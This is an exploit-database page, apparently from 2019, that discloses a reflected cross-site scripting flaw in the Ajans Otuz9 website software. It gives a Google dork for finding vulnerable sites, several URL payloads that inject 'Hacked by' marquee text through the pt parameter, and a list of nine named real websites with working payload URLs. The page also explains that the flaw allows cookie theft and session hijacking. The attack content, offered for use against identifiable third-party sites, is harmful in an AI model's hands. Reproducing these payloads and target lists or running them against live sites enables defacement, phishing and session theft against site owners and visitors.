facebook facebook twitter rss

Ajans Otuz9 Cross Site Scripting

Author: KingSkrupellos , Published: 19-06-2019
###################################################################

# Exploit Title : Ajans Otuz9 Cross Site Scripting
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/06/2019
# Vendor Homepage : otuz9.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-79 [ Improper Neutralization of
Input During Web Page Generation ('Cross-site Scripting') ]
# Google Dorks : intext:Ajans Otuz9 inurl:/?Syf=
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/ascii/WLB-2019010038

###################################################################

Impact - Reflected XSS Cross Site Scripting (or Non-Persistent) :
*********************************************************
The server reads data directly from the HTTP request and reflects it back in the
HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply
dangerous content to a vulnerable web application, which is then reflected back to the victim
and executed by the web browser. The most common mechanism for delivering malicious
content is to include it as a parameter in a URL that is posted publicly or e-mailed directly
to the victim. URLs constructed in this manner constitute the core of many phishing
schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site.
After the site reflects the attacker's content back to the victim,the content is
executed by the victim's browser. A successful exploit could allow the attacker
to execute arbitrary script code in the context of the affected site
and allow the attacker to access sensitive browser-based information.
An attacker, for example,can exploit this vulnerability to steal cookies from
the attacked user in order to hijack a session and gain access to the system.

###################################################################

# Reflected Cross Site Scripting XSS Exploits and Payloads :
****************************************************
/?Syf=7&UI=0&pt=1%27<marquee><font%20color=lime%20size=
32>XSS-Vulnerability-Found%20By%20KingSkrupellos</font></marquee>

/?Syf=21&pt=1%27"></h3></tr></td></table></tr></td>
</table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos

/?Syf=21&pt=1%27%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

/?Syf=[ID-NUMBER]&pt=1%27"></h3></tr></td></table>
</tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos

/?pnum=1&pt=1&pt=1%27%3Cmarquee
%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20
KingSkrupellos%3C/font%3E%3C/marquee%3E

/?SyfNmb=2&pt=1%27<marquee><font%20color=lime%20size=
32>XSS-Vulnerability-Found%20By%20KingSkrupellos</font></marquee>

###################################################################

# Example Vulnerable Sites :
*************************
[+] anadoluhareketi.com/?Syf=21&pt=1%27<marquee><font%20color=
lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

[+] iyigun.av.tr/?Syf=0&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] mavikaradeniztv.com.tr/?Syf=21&pt=1%27%3Cmarquee
%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos
%3C/font%3E%3C/marquee%3E

[+] lcmaks.com/?Syf=7&UI=0&pt=1%27%3Cmarquee%3E%3Cfont
%20color=lime%20size=32%3EXSS-Vulnerability-Found%20By%20
KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] gungorince.com/?Syf=21&pt=1%27%3Cmarquee%3E
%3Cfont%20color=lime%20size=32%3EHacked%20by%20
KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] perayapionarim.com/?Syf=21&pt=1%27%3Cmarquee
%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20
KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] saranmantolama.net/?Syf=21&pt=1%27%3Cmarquee
%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20
KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] idecplast.com.tr/?Syf=21&pt=1%27%3Cmarquee
%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20
KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] andoptik.com/?Syf=21&pt=1%27%3Cmarquee%3E
%3Cfont%20color=lime%20size=32%3EHacked%20by%20
KingSkrupellos%3C/font%3E%3C/marquee%3E

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Like us on Facebook :